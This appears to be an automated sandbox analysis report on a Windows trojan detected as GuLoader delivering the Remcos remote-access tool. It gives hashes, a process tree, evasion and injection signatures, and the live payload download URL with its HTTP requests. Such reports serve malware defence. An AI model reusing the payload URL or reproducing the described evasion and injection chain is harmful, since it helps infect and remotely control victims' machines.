Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
Analysis ID:430707
MD5:853744502b68e50e6cbaf81ffb3f5cc0
SHA1:ea748baebe70d7c6d3da9d1a2a34b76051425962
SHA256:8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 6696 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
      • wscript.exe (PID: 6480 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 6884 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • win.exe (PID: 5128 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
            • win.exe (PID: 2796 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • backgroundTaskHost.exe (PID: 7080 cmdline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
  • win.exe (PID: 5844 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • win.exe (PID: 5604 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
  • win.exe (PID: 5852 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • win.exe (PID: 5544 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 7 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: WScript or CScript DropperShow sources
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, ParentProcessId: 7080, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 6480

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005698CB LoadLibraryA,InternetReadFile,
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: ztechinternational.com
            Source: win.exe, 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, win.exe, 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin

            E-Banking Fraud:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY

            System Summary:

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9417 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98CB LoadLibraryA,NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A03 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A2F NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5230 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A41 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A57 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A74 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B528D NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9A95 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9AAF NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9AEC NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9B4B NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9B83 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9BCB NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B93CD NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9C14 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5023 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B506F NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98D8 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98F3 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9933 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5146 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B995D NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9951 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B996E NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B518F NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B999B NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B99E9 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98CB LoadLibraryA,NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A03 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A2F NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5230 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A41 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A57 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A74 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B528D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9A95 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9AAF NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9AEC NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9B4B NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9B83 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9BCB NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B93CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9C14 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5023 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B506F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98D8 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4CE4 NtWriteVirtualMemory,
